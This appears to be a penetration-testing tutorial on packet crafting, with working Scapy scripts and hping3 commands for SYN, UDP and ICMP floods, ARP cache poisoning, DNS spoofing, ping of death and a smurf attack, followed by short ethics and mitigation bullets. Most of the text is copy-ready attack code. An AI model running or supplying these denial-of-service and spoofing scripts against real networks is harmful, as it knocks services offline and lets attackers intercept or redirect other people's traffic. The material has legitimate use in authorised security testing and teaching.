Attacks Scenario

Packet crafting allows penetration testers to create custom network packets for various types of attacks. Here are a few common attacks that can be performed on a network using packet crafting, along with brief explanations and sample commands using tools like Scapy and Hping3.

1. TCP SYN Flood Attack

Objective: Overwhelm a target system with a flood of TCP SYN packets, exhausting resources and causing a denial of service (DoS).

Tools: Scapy, Hping3

Using Scapy:

from scapy.all import *

target_ip = "192.168.1.1"
target_port = 80

while True:
    packet = IP(dst=target_ip)/TCP(dport=target_port, flags="S")
    send(packet, verbose=0)

Using Hping3:

hping3 -S 192.168.1.1 -p 80 --flood

2. UDP Flood Attack

Objective: Flood a target with UDP packets, consuming bandwidth and causing a denial of service.

Tools: Scapy, Hping3

Using Scapy:

from scapy.all import *

target_ip = "192.168.1.1"
target_port = 53

while True:
    packet = IP(dst=target_ip)/UDP(dport=target_port)
    send(packet, verbose=0)

Using Hping3:

hping3 -2 192.168.1.1 -p 53 --flood

3. ICMP Flood Attack

Objective: Overwhelm a target with ICMP Echo Request (ping) packets, causing a denial of service.

Tools: Scapy, Hping3

Using Scapy:

from scapy.all import *

target_ip = "192.168.1.1"

while True:
    packet = IP(dst=target_ip)/ICMP()
    send(packet, verbose=0)

Using Hping3:

hping3 -1 192.168.1.1 --flood

4. ARP Spoofing/ARP Cache Poisoning

Objective: Send spoofed ARP messages to associate the attacker's MAC address with the IP address of another host, allowing interception or modification of traffic.

Tools: Scapy

Using Scapy:

from scapy.all import *

target_ip = "192.168.1.10"
spoof_ip = "192.168.1.1"
target_mac = "aa:bb:cc:dd:ee:ff"

packet = ARP(op=2, pdst=target_ip, psrc=spoof_ip, hwdst=target_mac)
send(packet, verbose=0)

5. DNS Spoofing

Objective: Send fake DNS responses to redirect a target's traffic to a malicious site.

Tools: Scapy

Using Scapy:

from scapy.all import *

target_ip = "192.168.1.10"
target_port = 53
fake_ip = "192.168.1.100"

dns_response = IP(dst=target_ip)/UDP(dport=target_port)/DNS(id=12345, qr=1, aa=1, qd=DNSQR(qname="example.com"), an=DNSRR(rrname="example.com", rdata=fake_ip))

send(dns_response)

6. Ping of Death

Objective: Send oversized ICMP packets to crash or destabilize the target system.

Tools: Scapy

Using Scapy:

from scapy.all import *

target_ip = "192.168.1.1"

packet = IP(dst=target_ip)/ICMP()/("X"*60000)
send(packet)

7. Smurf Attack

Objective: Use ICMP echo requests with a spoofed source address to flood a target with ICMP replies from multiple devices on a network.

Tools: Scapy

Using Scapy:

from scapy.all import *

broadcast_ip = "192.168.1.255"
target_ip = "192.168.1.1"

packet = IP(src=target_ip, dst=broadcast_ip)/ICMP()
send(packet, count=100)

Ethical Considerations

• Authorization: Always obtain explicit permission before performing any of these attacks.

• Controlled Environment: Conduct tests in a controlled and isolated environment to avoid unintentional damage.

• Responsible Disclosure: Report any vulnerabilities found responsibly to the appropriate stakeholders.

Mitigation Tips

• Network Segmentation: Properly segment networks to limit the impact of attacks.

• Intrusion Detection/Prevention Systems: Deploy IDS/IPS to detect and prevent malicious activities.

• Regular Audits: Perform regular security audits to identify and remediate vulnerabilities.

• Access Controls: Implement strong access controls and authentication mechanisms to protect network devices and systems.

By understanding these attacks and responsibly testing them, you can help identify and mitigate vulnerabilities, strengthening overall network security.